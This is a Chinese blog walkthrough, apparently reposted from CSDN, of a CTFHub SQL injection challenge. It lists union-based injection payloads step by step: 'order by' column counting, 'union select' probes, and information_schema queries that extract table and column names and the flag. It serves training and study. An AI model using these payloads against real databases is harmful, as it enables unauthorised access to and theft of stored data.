首页 > 数据库 >ctfhub-sql注入-injection-解题思路

ctfhub-sql注入-injection-解题思路

时间:2024-08-01 11:53:56浏览次数:14  
标签:回显 无回显 ctfhub union flag sql injection select

1.打开题目,判断是数字型注入还是字符型注入

       1.输入1’   //无回显

                1‘  --+ //也是没有回显

               1”    //无回显

                1“--=  //无回显

都没有回显,所以判断为数字型注入

2.使用命令进行判断列数

        1 order by 1  //有回显

        1 order by 2  //有回显

        1 order by 3  //无回显

       说明了回显有两列,

3.判断回显的位置

        1 union select 1,2  //发现2有回显位

4.通过回显位进行注入

        1 union select 1,database()  //查看到了数据库为ctfhub

        通过数据库名字进行查询表名

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfhub'   //查看到了表名为flag,info

通过表名查列名:

1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'  //查看列名为flag

通过列名查字段

1 union select 1,flag from ctfhub.flag  //查看flag

标签:回显,无回显,ctfhub,union,flag,sql,injection,select
From: https://blog.csdn.net/chinese_cabbage0/article/details/140844015

相关文章

  • nodejs 使用 sequelize 实现 mysql数据库的批量插入
    直接上代码:/***设置mysql连接,返回连接实例。连接格式:账户:密码@数据库地址/具体数据库名称***/constsetConnect=()=>{constsequelize=newSequelize(`mysql://${你的mysql地址}`,{logging:(...msg)=>Logger.INSTANCE.inf......
  • 从MySQL大量数据清洗到TiBD说起
    一、业务背景公司主要做的业务是类似贝壳的二手房租售,数据库中存了上亿级别的房源数据,之前数据库使用的是mysql,后面需要将mysql数据库切换成了Tidb,在切换的过程中,需要将老库的数据经过数据清洗后再存入新库(因为有一些表结构的设计变了),其中我们处理的一个逻辑就是将房间......
  • 【漏洞复现】用友时空KSOA PrintZPFB.jsp SQL注入漏洞
    0x01产品简介用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。0x02漏洞概述用友时空KSOA系统PrintZPFB.jsp接口处存在SQL注入漏洞,未经身份验证的......
  • MySQL安装教程(保姆级)
    1.首先要了解自己的计算机打开设置——系统——系统信息然后就可以知道自己计算机的类型了。2.下载MySQL2.1.来到MySQL官网点击进入我们下拉页面,可以找到DOWNLOADS页面默认给咱们选择最新的版本,咱们不用,咱们尽量选一个稳定的版本。而且,版本过高后,就没......
  • mysql复习
     一、DELETE和TRUNCATE的用法DELETE用法DELETE命令用于从数据表中删除指定的记录。其基本语法如下:DELETEFROM表名WHERE条件;示例:DELETEFROMemployeesWHEREemployee_id=100;上述示例将从employees表中删除employee_id为100的记录。......
  • MySQL 中 Varchar(50) 和 varchar(500) 有什么区别?
    问题我们在设计表结构的时候,设计规范里面有一条如下规则:对于可变长度的字段,在满足条件的前提下,尽可能使用较短的变长字段长度。为什么这么规定,主要基于两个方面基于存储空间的考虑基于性能的考虑网上说Varchar(50)和varchar(500)存储空间上是一样的,真的是这样吗?基于性......
  • ctfshow-web入门-sql注入(web171-web175)
    目录1、web1712、web1723、web1734、web1745、web1751、web171单引号测一下,报错 --+闭合后回显正常 也可以用#,不过需要URL编码成功闭合之后,先判断下字段数:1'orderby3--+3的时候正常 4的时候报错,说明只有3列  测了一下,三个回显位都能正......
  • SQL注入——报错注入
    1.何为报错注入?报错注入是一种在SQL注入攻击中利用数据库的错误信息来获取敏感数据的技术。当网站的web服务器开启了错误回显,并且数据库执行出错时,攻击者可以通过构造特定的SQL语句,让数据库在报错信息中泄露敏感数据。2.利用报错注入有哪些前提条件?Web应用程序未关闭数据库......
  • Dependency Injection: 如何解决依赖注入失败问题
    DependencyInjection:如何解决依赖注入失败问题......
  • 【MySQL】事务 【上】{事务的版本支持 事务提交方式 实验结论 用户问题 如何理解隔离
    文章目录1.引入事务事务的版本支持事务提交方式实验结论用户问题2.隔离性如何理解隔离性隔离级别查看与设置隔离性4.四种隔离级别的场景读未提交读已提交可重复读串行化1.引入事务当客户端A检查还有一张票时,将票卖掉,还没有执行更新数据库的时候,客户端B检查了票数......